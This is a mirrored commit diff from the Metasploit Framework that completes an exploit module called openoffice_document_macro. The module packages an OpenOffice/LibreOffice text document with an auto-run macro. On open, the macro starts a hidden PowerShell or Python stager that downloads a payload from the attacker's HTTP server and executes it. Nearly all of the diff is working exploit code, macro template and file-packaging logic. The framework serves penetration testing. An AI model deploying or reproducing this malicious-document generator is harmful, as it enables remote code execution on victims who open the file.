mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Completed version of openoffice_document_macro
This commit is contained in:
parent
cefbee2df4
commit
047a9b17cf
@ -2,7 +2,5 @@
|
||||
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
|
||||
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">REM ***** BASIC *****
|
||||
|
||||
Sub OnLoad
|
||||
MsgBox "Auto1111?"
|
||||
End Sub
|
||||
</script:module>
|
||||
CODEGOESHERE
|
||||
</script:module>
|
||||
|
@ -1,2 +1,2 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:textooo="http://openoffice.org/2013/office" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" office:version="1.2"><office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:Standard.Module1.OnLoad?language=Basic&location=document" xlink:type="simple"/></office:event-listeners></office:scripts><office:font-face-decls><style:font-face style:name="Mangal1" svg:font-family="Mangal"/><style:font-face style:name="Times New Roman" svg:font-family="'Times New Roman'" style:font-family-generic="roman" style:font-pitch="variable"/><style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="swiss" style:font-pitch="variable"/><style:font-face style:name="Mangal" svg:font-family="Mangal" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="Microsoft YaHei" svg:font-family="'Microsoft YaHei'" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="SimSun" svg:font-family="SimSun" style:font-family-generic="system" style:font-pitch="variable"/></office:font-face-decls><office:automatic-styles/><office:body><office:text><text:sequence-decls><text:sequence-decl text:display-outline-level="0" text:name="Illustration"/><text:sequence-decl text:display-outline-level="0" text:name="Table"/><text:sequence-decl text:display-outline-level="0" text:name="Text"/><text:sequence-decl text:display-outline-level="0" text:name="Drawing"/></text:sequence-decls><text:p text:style-name="Standard"/></office:text></office:body></office:document-content>
|
||||
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:textooo="http://openoffice.org/2013/office" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" office:version="1.2"><office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:Standard.Module1.OnLoad?language=Basic&location=document" xlink:type="simple"/></office:event-listeners></office:scripts><office:font-face-decls><style:font-face style:name="Mangal1" svg:font-family="Mangal"/><style:font-face style:name="Times New Roman" svg:font-family="'Times New Roman'" style:font-family-generic="roman" style:font-pitch="variable"/><style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="swiss" style:font-pitch="variable"/><style:font-face style:name="Mangal" svg:font-family="Mangal" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="Microsoft YaHei" svg:font-family="'Microsoft YaHei'" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="SimSun" svg:font-family="SimSun" style:font-family-generic="system" style:font-pitch="variable"/></office:font-face-decls><office:automatic-styles/><office:body>DOCBODYGOESHER<office:text><text:sequence-decls><text:sequence-decl text:display-outline-level="0" text:name="Illustration"/><text:sequence-decl text:display-outline-level="0" text:name="Table"/><text:sequence-decl text:display-outline-level="0" text:name="Text"/><text:sequence-decl text:display-outline-level="0" text:name="Drawing"/></text:sequence-decls><text:p text:style-name="Standard"/></office:text></office:body></office:document-content>
|
||||
|
@ -1,121 +0,0 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/zip'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
WINDOWSGUI = 'windows'
|
||||
OSXGUI = 'osx'
|
||||
LINUXGUI = 'linux'
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Apache OpenOffice Text Document Malicious Macro Execution",
|
||||
'Description' => %q{
|
||||
This module generates an Apache OpenOffice Text Document with a malicious macro in it.
|
||||
For exploit successfully, the targeted user must adjust the security level in Macro
|
||||
Security to either Medium or Low. If set to Medium, a prompt is presented to the user
|
||||
to enable or disable the macro. If set to Low, the macro can automatically run without
|
||||
any warning.
|
||||
|
||||
The module also works against LibreOffice.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'sinn3r' # Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'DisablePayloadHandler' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
['Apache OpenOffice', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Jan 10 2017",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new("BODY", [false, 'The message for the document body', '']),
|
||||
OptString.new('FILENAME', [true, 'The OpoenOffice Text document name', 'msf.odt'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def macro_code
|
||||
%Q|
|
||||
function GetOS() as string
|
||||
select case getGUIType
|
||||
case 1:
|
||||
GetOS = "#{WINDOWSGUI}"
|
||||
case 3:
|
||||
GetOS = "#{OSXGUI}"
|
||||
case 4:
|
||||
GetOS = "#{LINUXGUI}"
|
||||
case
|
||||
end select
|
||||
end function
|
||||
|
|
||||
end
|
||||
|
||||
def on_file_read(short_fname, full_fname)
|
||||
buf = File.read(full_fname)
|
||||
|
||||
case short_fname
|
||||
when /content\.xml/
|
||||
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
|
||||
when /Module1\.xml/
|
||||
buf.gsub!(/CODEGOESHERE/, macro_code)
|
||||
end
|
||||
|
||||
yield short_fname, buf
|
||||
end
|
||||
|
||||
|
||||
def package_odt(path)
|
||||
zip = Rex::Zip::Archive.new
|
||||
|
||||
Dir["#{path}/**/**"].each do |file|
|
||||
p = file.sub(path+'/','')
|
||||
|
||||
if File.directory?(file)
|
||||
print_status("Packaging directory: #{file}")
|
||||
zip.add_file(p)
|
||||
else
|
||||
on_file_read(p, file) do |fname, buf|
|
||||
print_status("Packaging file: #{fname}")
|
||||
zip.add_file(fname, buf)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
zip.pack
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
print_status('Generating our odt file...')
|
||||
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'openoffice_document_macro')
|
||||
docm = package_docm(path)
|
||||
file_create(docm)
|
||||
super
|
||||
end
|
||||
|
||||
end
|
214
modules/exploits/multi/misc/openoffice_document_macro.rb
Normal file
214
modules/exploits/multi/misc/openoffice_document_macro.rb
Normal file
@ -0,0 +1,214 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/zip'
|
||||
require 'cgi'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
WINDOWSGUI = 'windows'
|
||||
OSXGUI = 'osx'
|
||||
LINUXGUI = 'linux'
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Apache OpenOffice Text Document Malicious Macro Execution",
|
||||
'Description' => %q{
|
||||
This module generates an Apache OpenOffice Text Document with a malicious macro in it.
|
||||
For exploit successfully, the targeted user must adjust the security level in Macro
|
||||
Security to either Medium or Low. If set to Medium, a prompt is presented to the user
|
||||
to enable or disable the macro. If set to Low, the macro can automatically run without
|
||||
any warning.
|
||||
|
||||
The module also works against LibreOffice.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'sinn3r' # Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'DisablePayloadHandler' => false
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Apache OpenOffice on Windows (PSH)', {
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X86, ARCH_X64]
|
||||
}],
|
||||
[
|
||||
'Apache OpenOffice on Linux/OSX (Python)', {
|
||||
'Platform' => 'python',
|
||||
'Arch' => ARCH_PYTHON
|
||||
}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Feb 8 2017"
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new("BODY", [false, 'The message for the document body', '']),
|
||||
OptString.new('FILENAME', [true, 'The OpoenOffice Text document name', 'msf.odt'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, req)
|
||||
print_status("Sending payload")
|
||||
|
||||
if target.name =~ /PSH/
|
||||
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
|
||||
else
|
||||
p = payload.encoded
|
||||
end
|
||||
|
||||
send_response(cli, p, 'Content-Type' => 'application/octet-stream')
|
||||
end
|
||||
|
||||
|
||||
def primer
|
||||
print_status("Generating our odt file for #{target.name}...")
|
||||
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'openoffice_document_macro')
|
||||
docm = package_odt(path)
|
||||
file_create(docm)
|
||||
end
|
||||
|
||||
|
||||
def get_windows_stager
|
||||
%Q|Shell("cmd.exe /C ""#{generate_psh_stager}""")|
|
||||
end
|
||||
|
||||
|
||||
def get_unix_stager
|
||||
%Q|Shell("#{generate_python_stager}")|
|
||||
end
|
||||
|
||||
|
||||
def generate_psh_stager
|
||||
@windows_psh_stager ||= lambda {
|
||||
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
||||
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(get_uri)
|
||||
download_and_run = "#{ignore_cert}#{download_string}"
|
||||
generate_psh_command_line(
|
||||
noprofile: true,
|
||||
windowstyle: 'hidden',
|
||||
command: download_and_run)
|
||||
}.call
|
||||
end
|
||||
|
||||
|
||||
def generate_python_stager
|
||||
@python_stager ||= lambda {
|
||||
%Q|python -c ""import urllib2; r = urllib2.urlopen('#{get_uri}'); exec(r.read());""|
|
||||
}.call
|
||||
end
|
||||
|
||||
|
||||
def get_statger
|
||||
case target.name
|
||||
when /PSH/
|
||||
get_windows_stager
|
||||
when /Python/
|
||||
get_unix_stager
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# This macro code has the following in mind:
|
||||
# 1. It checks the platform to eliminate less misfires. Since we have only tested on Windows/Linux/OSX,
|
||||
# we only want to fire at those.
|
||||
# 2. Originally, I tried to embed the payload in the macro code, write it out and then execute it.
|
||||
# This turned out to be problematic, because for some reason OpenOffice is not able to
|
||||
# write a large string to a file (I've tried either shell("echo") or using the macro API).
|
||||
# The stager code is similar to web_delivery.
|
||||
def macro_code
|
||||
CGI.escapeHTML(%Q|
|
||||
Sub OnLoad
|
||||
Dim os as string
|
||||
os = GetOS
|
||||
If os = "#{WINDOWSGUI}" OR os = "#{OSXGUI}" OR os = "#{LINUXGUI}" Then
|
||||
Exploit
|
||||
end If
|
||||
End Sub
|
||||
|
||||
Sub Exploit
|
||||
#{get_statger}
|
||||
End Sub
|
||||
|
||||
Function GetOS() as string
|
||||
select case getGUIType
|
||||
case 1:
|
||||
GetOS = "#{WINDOWSGUI}"
|
||||
case 3:
|
||||
GetOS = "#{OSXGUI}"
|
||||
case 4:
|
||||
GetOS = "#{LINUXGUI}"
|
||||
end select
|
||||
End Function
|
||||
|
||||
Function GetExtName() as string
|
||||
select case GetOS
|
||||
case "#{WINDOWSGUI}"
|
||||
GetFileName = "exe"
|
||||
case else
|
||||
GetFileName = "bin"
|
||||
end select
|
||||
End Function
|
||||
|)
|
||||
end
|
||||
|
||||
def on_file_read(short_fname, full_fname)
|
||||
buf = File.read(full_fname)
|
||||
|
||||
case short_fname
|
||||
when /content\.xml/
|
||||
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
|
||||
when /Module1\.xml/
|
||||
buf.gsub!(/CODEGOESHERE/, macro_code)
|
||||
end
|
||||
|
||||
yield short_fname, buf
|
||||
end
|
||||
|
||||
|
||||
def package_odt(path)
|
||||
zip = Rex::Zip::Archive.new
|
||||
|
||||
Dir["#{path}/**/**"].each do |file|
|
||||
p = file.sub(path+'/','')
|
||||
|
||||
if File.directory?(file)
|
||||
print_status("Packaging directory: #{file}")
|
||||
zip.add_file(p)
|
||||
else
|
||||
on_file_read(p, file) do |fname, buf|
|
||||
print_status("Packaging file: #{fname}")
|
||||
zip.add_file(fname, buf)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
zip.pack
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
super
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue
Block a user